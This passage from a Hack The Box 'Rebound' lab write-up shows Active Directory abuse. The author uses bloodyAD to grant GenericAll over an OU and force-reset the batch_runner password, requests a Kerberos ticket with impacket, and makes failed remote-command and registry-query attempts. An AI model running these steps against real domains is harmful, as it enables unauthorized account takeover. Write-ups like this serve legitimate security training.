batch_runner
As discovered from the 2nd BloodHound session, the batch_runner user might come valuable as it might be executing automated scripts as the name suggests. Additionally, the batch_runner account is not part of the Remote Management Users group, so I’d have to find other ways to work with the account
Since I have a complete control over the Service Users OU, I could also change the password of the batch_runner account, much like the winrm_svc account
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=batch_runner,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb
[+] Password changed successfully!Validation
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-getTGT rebound.htb/batch_runner@dc01.rebound.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Saving ticket in batch_runner@dc01.rebound.htb.ccacheDone & confirmed
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> $Cred = New-Object System.Management.Automation.PSCredential("REBOUND\batch_runner", (ConvertTo-SecureString "Qwer1234" -AsPlainText -Force))
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock { whoami }
Connecting to remote server DC01 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (DC01:String) [], PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBrokenUnfortunately, I am unable to perform the PowerShell’s Invoke-Command cmdlet with the credential of the batch_runner account
I will see if there’s anything interesting in the registry such as logon script
Registry
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ScheduledTasks"
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-reg rebound.htb/batch_runner:Qwer1234@dc01.rebound.htb query -keyName "HKLM\SYSTEM\CurrentControlSet\Services\Schedule"
Impacket v0.11.0 - Copyright 2023 Fortra
[!] Cannot check RemoteRegistry status. Hoping it is started...
[-] dcerpc runtime error: code: 0x5 - rpc_s_access_denied Access Denied This appears to be deadend